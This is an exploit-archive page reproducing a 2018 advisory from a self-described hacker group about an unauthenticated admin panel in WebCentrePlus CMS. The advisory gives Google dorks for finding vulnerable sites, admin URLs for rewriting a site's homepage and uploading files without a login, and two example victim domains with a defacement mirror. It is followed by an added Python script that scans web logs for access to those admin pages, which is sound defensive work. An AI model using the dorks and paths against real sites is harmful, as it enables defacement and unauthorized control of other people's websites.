Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Control Panel Vulnerability

2018.05.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################################
# Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepages => webcentreplus.com - webcastle.co.uk
# Date: 22/05/2018
# Exploit Risk : Medium
#################################################################################
# Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass and Wysiwyg Editor Vulnerability
# Google Dork => intext:''Copyright © 2018 WebCentrePlus''
# Google Dork => intext:''CMS by Webcastle''
# Exploit => ...../admin/siteContent/index.html
# You can edit website Homepage via => ...../admin/siteContent/editText.html?id=1
# You will see your index on the homepage of the site.
# Admin Panel without username and password [ Screenshot ] => cdn.pbrd.co/images/Hmow6lo.png
# Secondly you can upload an image on the website without any authorization.
# ....../admin/siteContent/uploadDynamic.html
Guidelines : You can upload images of type GIF, JPG or PNG only. Remember that large images will take a while to download.
Note : It says => You must specify a new image file and a name. Please complete the missing information below and click 'Upload'.
# ...../images/upload/dynamic/RANDOM-NUMBERS.png .jpg .gif or your uploaded image file goes to this path
# ...../images/upload/RANDOM-NUMBERS.png .jpg .gif
#################################################################################
# Example Site :
# nowlogiXt.com/admin/siteContent/index.html
# linXuxtrial.com/admin/siteContent/index.html
# Example Mirror [ Proof ] => archive.is/M8jdH
#################################################################################
# Discovered By : KingSkrupellos from Cyberizm.Org
# Greetings : All Moslem Hackers and Cyberizm Digital Security Team
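For site operators, an added detection example (not part of the original advisory or the vendor's code): it scans web server access logs for successful requests to the `/admin/siteContent/` pages named above that come from outside an administrator network. The allowlist network, the POST-for-writes rule and the sample log lines are assumptions constructed for illustration.

```python
import re
from ipaddress import ip_address, ip_network

ADMIN_PREFIX = "/admin/sitecontent/"            # advisory path, lower-cased
WRITE_PAGES = {"/admin/sitecontent/edittext.html",
               "/admin/sitecontent/uploaddynamic.html"}
# Assumption: administrators connect only from these networks (constructed).
ADMIN_NETS = [ip_network("192.0.2.0/24")]

# Common/combined log format: ip ident user [time] "METHOD path proto" status size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(line):
    """Return (severity, ip, method, path) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    if not path.startswith(ADMIN_PREFIX):
        return None
    try:
        src = ip_address(m["ip"])
    except ValueError:
        return None                      # hostname or garbage in the client field
    if any(src in net for net in ADMIN_NETS):
        return None                      # expected administrator traffic
    if not m["status"].startswith("2"):
        return None                      # denied or redirected to a login page
    # Assumption: edits and uploads are submitted as POST requests.
    write = m["method"] == "POST" and path in WRITE_PAGES
    return ("high" if write else "medium", m["ip"], m["method"], m["path"])

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/May/2018:10:01:02 +0000] "GET /admin/siteContent/index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/May/2018:10:01:40 +0000] "POST /admin/siteContent/editText.html?id=1 HTTP/1.1" 200 310',
    '198.51.100.7 - - [22/May/2018:10:02:11 +0000] "POST /admin/siteContent/uploadDynamic.html HTTP/1.1" 200 842',
    '192.0.2.15 - - [22/May/2018:10:03:00 +0000] "GET /admin/siteContent/index.html HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/May/2018:10:04:00 +0000] "GET /admin/siteContent/index.html HTTP/1.1" 302 0',
    '203.0.113.9 - - [22/May/2018:10:04:05 +0000] "GET /index.html HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A "medium" hit means a panel page was served to an outside address; a "high" hit means a content edit or image upload was accepted from one.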



Copyright 2024, cxsecurity.com
